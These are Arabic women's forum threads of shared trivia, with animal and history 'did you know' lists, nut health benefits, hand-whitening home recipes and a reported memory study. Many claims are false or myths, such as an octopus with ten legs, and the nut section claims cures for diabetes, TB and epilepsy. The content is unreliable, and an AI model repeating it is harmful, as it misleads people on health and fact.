مشكورة ع الموضوع تم التفحيط له



التصنيفات
السيدات و سوالف حريم

لنتشارك المعلومات

خليجية

فِيَ كُلِ يوِمٍ نتعْلَمُ شَيءٌ جْدَيدٌ …

و لَنْ نُبألغَ إنَ قولنآ فِيَ كْلِ لحْظةٍ وَ فيَ كُلِ مشَهْدٍ مِنَ مَشْأهدِ ألحْيأة ..!

نَكْتسبُ خُبرأتٍ وَ مَعَلُوَمْأتٍ على مَرِ ألسْنينِ .., !

[ مِنَ خِلآلِ ألقِرآءةِ فِيَ ألكُتُبِ أوِ ألدِرأسةِ أوِ مِنَ ألآطِلآعِ عَلى ألآنترِ نِتَ أوِ حَتىَ مِنَ ألحْيأةِ ] …هُنآ نسْكُبُ مَا تعلمَنأهُ , وِنَنَثرُ تِلْكَ ألمَعلوِمآت عَلى صَفحآتٍ تنيرِ ألعْقلَ وْ ألفكْرِ ~

شَآرِكُينيَ ..

:010:




موضوع روعة
لكي مني أحلى تقييم

أخر معلومة قرأتها
هي كنتي حطاها في موضوعك
أن الانسان لا يجب أن
ينام وهو زعلان لأن هذا يتسبب
في موت الخلايا الدماغية




خليجية



اقتباس:
المشاركة الأصلية كتبت بواسطة صفاء* خليجية
خليجية

:icon_razz: أشكر مرورك يالغالية :icon_razz:




التصنيفات
المواضيع المتشابهة للاقسام العامة

بنك المعلومات

أنا اليوم أقترح هذه الفكرة ..ألا وهي بنك المعلومات…كل وحدة فينا تكتب معلومة (علمية,عامة طبية…..الخ) المهم أنها تكون معلومة مفيدة و نستفيد منها كلنا….من أفضل الكلام ما قل و دل…

خليجية

رح أبدأ انا الاولى….

هل تعلم أن الزرافة لطول رقبتها فهي لا تنام في اليوم الواحد إلا تسع دقائق و ليست على مرة واحدة إنما على ثلاث مراحل كل مرة ثلاث دقائق

أرجوا التثبيت بليز




بلدة أوغندة هي البلد الوحيدة التي لا يتغير فيها موعد الإفطار في شهر رمضان صيفاً وشتاء… بسبب موقعها على خط الاستواء حيث يتساوى طول اليل والنهار على مدار السنة دون تغير يذكر.



هناك 4 لم تحمل بهم أنثى وهم: آدم – حواء – كبش فداء إسماعيل – وناقة صالح حيث خرجت من الصخرة.



مشكورة هدى على هذه الفكرة



نموت عليك يا امونة

خليجية




التصنيفات
الاستشارات الخاصة و استشارات الصحة و الطب

من فوائد ومنافع المكسرات هذه المعلومات الهامة

:0154:من فوائد ومنافع المكسرات ، يقدم لكِ الخبراء فوائد هذه الأنواع من المكسرات : الزبيب ‏:‏ يوصف لعلاج النزلات وآلام الصدر والمعدة‏.‏

عين الجمل‏ ، الجوز :‏ يستعمل كمطهر للأمعاء ويقي الجهاز الهضمي وهو أحد الملينات الفعالة التي لا خطر من استعمالها أثناء الحمل كما يساعد علي تنقية الدم .

البندق ‏:‏ يوصف للمصابين بالسكر والدرن والصرع والتهاب المسالك البولية ويستعمل لتنقية الأمعاء ولعلاج الترهل وعيوب الجسم ‏.‏

اللوز‏:‏ يساعد في المحافظة علي سلامة الأمعاء والقولون ويمنع ظهور الأورام السرطانية فيها ويعتبر من أهم المقويات للقلب‏.‏

جوز الهند‏:‏ يساعد علي نقاء الحنجرة وتقوية الكلي والكبد‏.‏

الفستق : غني بالزيوت الدهنية ، ومنها زيوت دهنية غير مشبعة ، وهي أساسية في تغذية الدماغ ، لذا فهو منشط جيد للدماغ ووظائفه من حفظ وتركيز، ويمنع النسيان ، وينشّط الدورة الدموية في الدماغ ويمنع القيء عن طريق تقوية أعصاب عضلة فم المعدة ، كما يمنع الحموضة، ويزيد من إدرار الحليب بالنسبة للأم المرضعة ، ويعالج الأمراض التناسلية




خليجية



مساء الخير ..

بجد موضوع شيق .. تسلم الايادي يا الغالية وإلى الامام




التصنيفات
العناية بالبشرة و الجسم

كيف تحافظين علي نعومة يديك؟ تفضلي المعلومات هنا للعناية

يؤثر استخدام المنظفات في أعمال المنزل علي بشرة يديك ومظهرهما‏..‏ فكيف تحافظين عليهما بعد استخدام السوائل المنظفة.
وهو بأن تغسلي يديك بالماء والصابون بعد انتهاء الأعمال المنزلية لإزالة آثار المنظفات الصناعية‏,‏ واستخدام القفاز عند غسل الصحون وتجنب لمس الكلور والمنظفات القوية قبل تخفيفهما.
ويفضل استخدام مستحضرات طبيعية للحفاظ علي بشرة يديك مثل زيت الزيتون أو الفازلين ثم غسلها جيدا بالماء لتشعري بنعومة يديك‏.‏وفي حالة رغبتك في تبيض اليدين يمكن استخدام عدة وصفات
الأولي‏:‏ مزج ملعقة صغيرة من عصير اليمون وملعقة من زيت الزيتون‏,‏ وملعقة ماء فاتر ثم ضعي الخليط علي اليدين مع التدليك‏,‏ بعد ذلك تمسح اليد بمنديل جاف‏,‏ ويفضل أن تستعمل هذه الطريقة في المساء‏.‏
الثانية‏:‏ مقادير متساوية من اليمون وعصير البطاطا تدهن بها الأماكن المراد تفتيحها كاليدين‏,‏ وفي أقل من أسبوع ستبدأ النتائج بالظهور‏,‏ هذه الوصفة يمكن أن تستعمل لجميع أنواع البشرة‏.‏
الثالثة‏:‏ ملعقة ونصف عسل‏,‏ وعشر ملاعق ماء ورد و‏4‏ ملاعق جلسرين‏,‏ ونصف ملعقة خل‏,‏ قومي بتسخين العسل علي نار هادئة ثم اخلطيه مع بقية المكونات ويوضع علي اليدين لمدة نصف ساعة‏.‏
:icon_cool::icon_cool::icon_co ol:



خليجية



التصنيفات
منوعات

أجمل المعلومات العامة . وأغربهاااا

أجمل المعلومات العامة وأغربهااا ~~~

إذا مات الفيل وهو واقف
فانه يظل واقفاً لبضع ساعات قبل أن يسقط أرضا.

*النعامة تعيش حتى 75 عاما
وتظل قادرة على التكاثر حتى سن الخمسين.

*في مصر الفرعونية كان الأسبوع يتألف من 10 أيام.

*يتعين على معدة الإنسان
أن تفرز بطانة مخاطية جديدة
كل أسبوعين وإلا فإنها ستهضم نفسها.

*هناك نوع من النمل يشتهر باسم «النمل السفاح»
وذلك لأنه يشن غارات على مستعمرات النمل المجاورة له
حيث يقتل ملكاتها وينهب محتوياتها
ثم يقتاد عددا من ذلك النمل ويجبره على العمل كعبيد لديه!

*الذهب عيار 24 قيراطا ليس ذهبا خالصا بنسبة 100 في المائة
بل يحتوي على نسبة ضئيلة من النحاس
وذلك أن الذهب الخالص مئة في المائة
يكون لينا كالصلصال
لدرجة انه يصبح من الممكن تشكيله باليدين

*يقوم أفراد أحدى القبائل الماليزية

*الإنسان هو الكائن الوحيد
الذي يستطيع أن يتصل ***يا مع أنثاه وهما وجها لوجه.

*النعامة لا تدفن رأسها في الرمال هرباً من الخطر
بل بحثاً عن الماء.

*لاحظ العلماء أن النمل «يتثاءب»
كالبشر عندما يستيقظ من نومه في الصباح.

*في مصر الفرعونية
كانت جثث نساء النبلاء تترك لبضعة أيام
قبل أن تبدأ إجراءات تحنيطها وكان الهدف من وراء ذلك
هو السماح للجثة كي تفقد رونقها ونضارتها
حتى لا تبدو مثيرة في نظر المحنطين.

*قلب سمكة الروبيان يوجد في رأسها.

*كشفت بحوث مخبريه عن أن دخان السجائر
يحتوي على أكثر من 200 مادة كيماوية سامة
من بينها 43 مادة على الأقل تسبب السرطان.

*قبل بضع سنوات
ضربت صاعقة رعدية ملعبا لكرة القدم في جمهورية الكنغو الديمقراطية
خلال إحدى المباريات الغريب أن تلك الصاعقة قتلت جميع لاعبي احد الفريقين
في حين لم يصب أي لاعب من لاعبي الفريق المنافس بسوء.

*الشجرة العارية تستطيع أن تنقي حوالي 25 كيلوغراماً من الملوثات من الجو سنوياً.

*في العام 1894م كان في الولايات المتحدة الأميركية 4 سيارات فقط.

*أي قطعة ورق مربعة الشكل
لا يمكن أن تطوى على نفسها أكثر من 8 مرات
مهما كانت مساحتها كبيرة.

*حجم الشمس يوازي 330330 مرة
مقارنة بحجم الأرض.

*الرقم القياسي الذي حققته دجاجة
في الاستمرار في الطيران حتى الآن هو 13 ثانية فقط.

*الكرسي الكهربائي الذي يُستخدم في الإعدام
هو من اختراع طبيب أسنان.

*عندما يولد الإنسان يكون في جسمه 300 عظمة
إلا أن ذلك العدد يتراجع إلى 206 فقط عند الوصول إلى سن البلوغ

*كان المصريون القدماء يستعملون
براز التماسيح كوسيلة لمنع الحمل!

*طوال القرون السادس عشر والسابع عشر والثامن عشر
كان الأطباء الأوروبيون يستخدمون التبغ لمعالجة سلسلة من المشاكل الصحية
مثل الصداع وتسوس الأسنان والتهاب المفاصل وحتى رائحة الفم الكريهة.

*العضوان الوحيدان في جسم الإنسان اللذان لا يتوقفان عن النمو طوال الحياة هما الأنف والأذنان.

*تحتوى معدة الإنسان على نحو 35 مليون غدة هضمية.

*أطول كلمة إنجليزية
يمكن أن تكتب دون تكرار حرف واحد مرتين
هيuncopyrightables وهي تتألف من 16 حرفا.

*الزعيم النازي أدولف هتلر
كان ينوي تغيير اسم مدينــة برلين إلى جرمانيا.

*ذكر الثعلب لا يقترب سوى بأنثى واحدة فقط طوال حياته
وإذا ماتت تلك الأنثى فان الذكر يظل عزباً طوال حياته
أما إذا مات الذكر فإن الأنثى لا تتورع عن الارتباط بذكر جديد.

*أقوى عضلة في جسم الإنسان,,, هي اللسان.

*تحتوي شبكية العين على نحو 135 مليون خلية حسية
مسئولة عن التقاط الصور وتمييز الألوان.

*يستطيع رأس الثعبان أن يلدغ
حتى بعد مرور نصف ساعة على بتره.

*في العام 1471 شهدت مدينة بازل السويسرية إعدام دجاجة
بعد أن حوكمت رسميا بتهمة كونها شيطانا متنكراً في صورة دجاجة
وذلك لأنها وضعت بيضة ذات ألوان غريبة.

*إذا ذاب كل الجليد الموجود في القارة القطبية الجنوبية
فإن مستوى المحيطات والبحار سيرتفع بمعدل 70 متراً
وهو الأمر الذي يعني أن ربع اليابسة سيغمره الماء

*مملكة «لوسوتو» الأفريقية محاطة من جميع جوانبها
بجمهورية جنوب أفريقيا.

*يوجد حاليا نحو 70 قمراً اصطناعياً
تدور في مدارات مختلفة حول كوكب الأرض
بسرعات عالية ، وتتنوع استخداماتها
ما بين أقمار للتجسس
وأخرى للاتصالات والبث التلفزيوني ..




خليجيةخليجيةخليجيةخليجيةخليجية
مدائن.. من.. الشكر ..وجنآئن.. الجوري
لهـذآ..الطرح..الأكثر..من..رآآ ئع
صآحب..الحضور..المتميز
والع ـطآء..الرآقي
دآآمت..إطلالتكـ..في..منتدآآن ا
ودي..و..وردي
لكـً
خليجية



خليجية



يسلمووووووو على المعلومات المنوعه

يعطيكي الف عااافيه




التصنيفات
المواضيع المتشابهة للاقسام العامة

موسوعة لأغرب المعلومات وأطرفها‏

[IMG]http://www.5reb.com/5ra2eb/a25rab-mo/2zjj5z6.jpg[/IMG

أن الحوت الأزرق هو أثقل و أكبر وأضخم مخلوق في العالم
حيث يبلغ حجم قلب الحوت الأزرق البالغ يبلغ حجم سيارة
أما لسانه فيبلغ طوله حوالي خمسة سيارات

خليجية

الولاعة عرفت قبل أن يعرف عود الثقاب

خليجية

عالم الفيزياء « ألبرت اينشتاين » كان يجد صعوبة في النطق حتى بلغ سن التاسعة
وكان والداه ومعلموه يعتقدون أنه متخلف عقلياً

خليجية

ألكسندر غراهام بيل » مخترع التليفون لم يتصل هاتفيا مطلقا
بزوجته أو أمه وذلك لأنهما كانتا مصابتين بالصمم

خليجية

أن القائد العسكري والإمبراطور الفرنسي « نابليون بونابرت
كان يصاب بالذعر عندما يواجه " قطة

خليجية

ضوء الشمس يستغرق وصوله للأرض « 8 دقائق » فقط

خليجية

يعكس سطح القمر « 7% » من أشعة الشمس فقط

خليجية

يقول « علماء الفلك » أن عدد النجوم المتناثرة في أرجاء الكون
يزيد على عدد حبيبات الرمل الموجودة في كوكب الأرض

خليجية

القارة القطبية الجنوبية هي القارة الوحيدة في العالم
التي لا توجد بها أرض يابسة، بل تتألف من طبقة جليدية

يتبع




خليجية

الخطوط الجوية الأمريكية وفرت مبلغ أربعين ألف دولار في عام 1987م
عندما ألغت « زيتونة واحدة » من كل صحن سلطة يقدم لركاب الدرجة الأولى

خليجية

يعتبر الإخطبوط هو الحيوان الأذكى في عالم الافقاريات **
عندما يفقد الإخطبوط إحدى أذرعه الطويلة، تنمو ذراع بديلة لها تدريجياً فيما بعد **
تضع أنثى الإخطبوط « 60 ألف » بيضة ثم تلزم مخبأها ولا تغادره حتى تموت جوعا **
الإخطبوط له « 10 أرجل » و «3 قلوب **

خليجية

حيوان « خروف البحر » يذرف دموعاً حقيقية عندما يكون حزينا أو متألما أو في خطر

خليجية

فرس البحر » الحيوان الوحيد الذي يقوم الذكر فيه بالحمل والولادة
حليب أنثى« فرس النهر » المرضعة لون وردي فاتح

يتبع




خليجية

السلاحف تتنفس من مؤخرتها

خليجية

هناك نوع من الضفادع يعرف باسم « ضفدع قابيل **

وإذا لعقه شخص بلسانه فإنه يصاب بالهلوسة

تولد الضفادع بدون أرجل **

خليجية

التمساح لا يستطيع أن يخرج لسانه من فكيه **

إن كل الكائنات تحرك فكها السفلي عند الأكل، عدا التمساح، الذي يحرك فكه العلوي **

خليجية

صوت « البطة » لا يرد الصدى في أي مكان، و السبب غير معروف

خليجية

يمكن للحلزون أن ينام لمدة « 3 سنوات » متواصله

خليجية

حاسة التذوق عند الفراشات في قدميها

يتبع




خليجية

النحلة » ترفرف بجناحيها بمعدل «350 » مرة في الثانية الواحدة

خليجية

النملة » إذا انقلبت فإنها تنقلب على جنبها الأيمن فقط **

من الغريب والمدهش أن « الصرصور » بعد إحتكاكه بالإنسان يسارع إلى مخبئة لتنظيف نفسه **

أن قلب الذبابة يخفق «1000 » مرة في الدقيقة الواحدة **

إن مجموع ما تضعه أنثى الذباب من بيض طوال حياتها أكثر من «500 بيضة **

خليجية

تتحول الحرباء إلى الون الأسود عندما تغضب
العقرب إذا أُحيط بالنار فإنه يلسع نفسه « ويموت

خليجية

تستطيع « أفعى الأصلة الإفريقية » أن تبقى على قيد الحياة بلا طعام لمدة سنتين كاملتين

يتبع




خليجية

جميع « الثعابين » تتمتع بحصانه طبيعية ضد السموم التي تفرزها

ولذلك عندما يتصارع ثعبانان من النوع نفسه فإنهما

لا يتأثران بالدغات التي يوجهانها إلى بعضهما

خليجية

البعوضة لها أسنان، وعدد أسنانها « 47 سناً

خليجية

ولأرنب … « 28 سناً » في فمه

خليجية

ولفيل … « 32 سناً

خليجية

تحمل أنثى الأرنب من «30 إلى 35 » أرنب

يتبع




التصنيفات
الاستشارات الخاصة و استشارات الصحة و الطب

إثقال الذاكرة بالمعلومات مضر

السلام عليكم ورحمة الله وبركاته

خليجية

رأت دراسة جديدة أن حشو الذاكرة بشكل مفرط بالمعلومات يؤدي على عكس المبتغى، أي انه يرهق الذاكرة ويضعفها بدل من ان يقويها.

كشفت دراسة حديثة أجراها علماء في مختبر الذاكرة وحمايتها ودراسات المؤثرات عليها التابع لجامعة نيويورك ،عن أكبر وادق تقيم علمي لحدود وقدرة استيعاب ذاكرة الانسان للمعلومات ان كانت صورا او وجوها او قصصا او احداث على مختلف أنواعها.

وركزت هذا الدراسة على عامل الذاكرة على المدى الطويل، من أجل كسب معلومات أكثر على قدرة الحفظ ، فاتضح ان حشو الذاكرة بشكل مفرط بالمعلومات يؤدي على عكس المبتغى، أي انه يرهق الذاكرة ويضعفها بدل من ان يقويها حسب الاعتقاد السائد حتى الآن، وهذا يشكل دحضا لأساليب التعليم في المدارس التي تركز على تدريس التلاميذ مواد كثيرة ووجوب حفظها غيبا من أجل الاستعانة بها في الدراسات العالية او المستقبلية.

ودرس علماء المختبر الاميركي ظاهرة نشاط بروتينات ” جي سي أن 2″ التي تشكل جينات الذاكرة وهي التي تتولى وظيفة توليد جزيئات دقيقة في الدماغ تقيم ترابط وصلات فيما بين الاعصاب والتي يتم عبرها تخزين المعلومات في الذاكرة على المدى الطويل.

وقام العلماء بتحييد هذه البروتينات خلال تجارب أجريت على الفئران وذلك عبر إرسال مؤشرات الكترونية تؤدي الى شل وتوقف انتاجها، فتبين ان تلك الفئران المعدلة جينيا بحيث لا تنتج بروتينات ” جي سي أن2 ” اصبح بامكانها تخزين المعلومات بسرعة اكبر، وترتيبها دماغيا بشكل ابطأ ، مقارنة بالفئران العادية، وبالتالي أثبتت التجربة لاول مرة، وبشكل عملي، ان الافراط في إشباع الذاكرة بالمعلومات يجعلها لاحقا أبطأ وأقل قدرة على الاستيعاب.

واعتبر هذا الاكتشاف محطة هامة في مجال دراسة آليات عمل الذاكرة، حيث كان الاعتقاد السائد حتى الان ان الذاكرة البشرية لا حدود لطاقتها الاستيعابية، لذا يجب تزويدها باكبر كم من المعلومات. ويأمل العلماء الاميركيون الآن ان يكون هذا الاكتشاف منطلقا لأبحاث جديدة من اجل التوصل الى وسائل وتقنيات جديدة لتخلص الذاكرة وتنظيفها من الشوائب المتمثلة في المعلومات المختزنة التي لا فائدة منها او لا يحتاج الانسان في حياته، تماما مثل الوسيلة التي يمكن عبرها مسح ذاكرة الكمبيوتر وتنظيفها، حين يصبح مثقلا بالمعلومات التي لا فائدة لها.
لكم ودي




شكرا